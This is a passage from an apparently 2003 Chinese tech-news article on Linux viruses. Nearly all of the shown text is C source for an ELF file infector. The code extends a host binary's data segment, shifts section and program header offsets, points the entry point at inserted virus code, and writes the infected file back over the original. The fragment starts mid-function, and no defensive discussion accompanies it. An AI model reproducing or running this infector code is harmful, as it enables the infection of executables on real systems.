天极传媒:
天极网
比特网
IT专家网
52PK游戏网
极客修
全国分站

北京上海广州深港南京福建沈阳成都杭州西安长春重庆大庆合肥惠州青岛郑州泰州厦门淄博天津无锡哈尔滨

产品
  • 网页
  • 产品
  • 图片
  • 报价
  • 下载
全高清投影机 净化器 4K电视曲面电视小家电滚筒洗衣机
您现在的位置: 天极网>新闻>

Linux系统下病毒的研究

天极论坛 2003-09-09 17:04 我要吐槽
if (init_virus != NULL)
init_virus(
plt, sym_offset,
text_start, phdr->p_vaddr,
phdr->p_memsz,
ehdr.e_entry
);

ehdr.e_entry = phdr->p_vaddr + phdr->p_memsz;

break;
}
}

++phdr;
}

/* update the shdr's to reflect the insertion of the virus */

addlen = len + bss_len;

shdr = (Elf32_Shdr *)sdata;

for (i = 0; i < ehdr.e_shnum; i++) {
if (shdr->sh_offset >= offset) {
shdr->sh_offset += addlen;
}

++shdr;
}

/*
update the phdr's to reflect the extention of the data segment (to
allow virus insertion)
*/

phdr = (Elf32_Phdr *)pdata;

for (i = 0; i < ehdr.e_phnum; i++) {
if (phdr->p_type != PT_DYNAMIC) {
if (move) {
phdr->p_offset += addlen;
} else if (phdr->p_type == PT_LOAD && phdr->p_offset) {
/* is this the data segment ? */

phdr->p_filesz += addlen;
phdr->p_memsz += addlen;

#ifdef DEBUG
printf("phdr->filesz: %i
", phdr->p_filesz);
printf("phdr->memsz: %i
", phdr->p_memsz);
#endif
move = 1;
}
}

++phdr;
}

/* update ehdr to reflect new offsets */

if (ehdr.e_shoff >= offset) ehdr.e_shoff += addlen;
if (ehdr.e_phoff >= offset) ehdr.e_phoff += addlen;

if (fstat(fd, &stat) < 0) {
perror("fstat");
exit(1);
}

/* write the new virus */

if (mktemp(tempname) == NULL) {
perror("mktemp");
exit(1);
}

od = open(tempname, O_WRONLY | O_CREAT | O_EXCL, stat.st_mode);
if (od < 0) {
perror("open");
exit(1);
}

if (lseek(fd, 0, SEEK_SET) < 0) {
perror("lseek");
goto cleanup;
}

if (write(od, &ehdr, sizeof(ehdr)) < 0) {
perror("write");
goto cleanup;
}

if (write(od, pdata, plen) < 0) {
perror("write");
goto cleanup;
}
free(pdata);

if (lseek(fd, pos = sizeof(ehdr) + plen, SEEK_SET) < 0) {
perror("lseek");
goto cleanup;
}

if (copy_partial(fd, od, offset - pos) < 0) goto cleanup;

for (i = 0; i < bss_len; i++) write(od, &null, 1);

if (write(od, get_virus(), len) != len) {
perror("write");
goto cleanup;
}

if (copy_partial(fd, od, oshoff - offset) < 0) goto cleanup;

if (write(od, sdata, slen) < 0) {
perror("write");
goto cleanup;
}
free(sdata);

if (lseek(fd, pos = oshoff + slen, SEEK_SET) < 0) {
perror("lseek");
goto cleanup;
}

if (copy_partial(fd, od, stat.st_size - pos) < 0) goto cleanup;

if (rename(tempname, host) < 0) {
perror("rename");
exit(1);
}

if (fchown(od, stat.st_uid, stat.st_gid) < 0) {
perror("chown");
exit(1);
}


free(string);

return;

cleanup:
unlink(tempname);
exit(1);
}

int main(int argc, char *argv[])
{
if (argc != 2) {
fprintf(stderr, "usage: infect-data-segment filename
");
exit(1);
}

infect_elf(
argv[1],
get_virus, init_virus,
sizeof(v),
"printf"
);

exit(0);
}
<-->

作者:责任编辑:)
请关注天极网天极新媒体 最酷科技资讯
扫码赢大奖
评论
* 网友发言均非本站立场,本站不在评论栏推荐任何网店、经销商,谨防上当受骗!
笔记本手机数码家电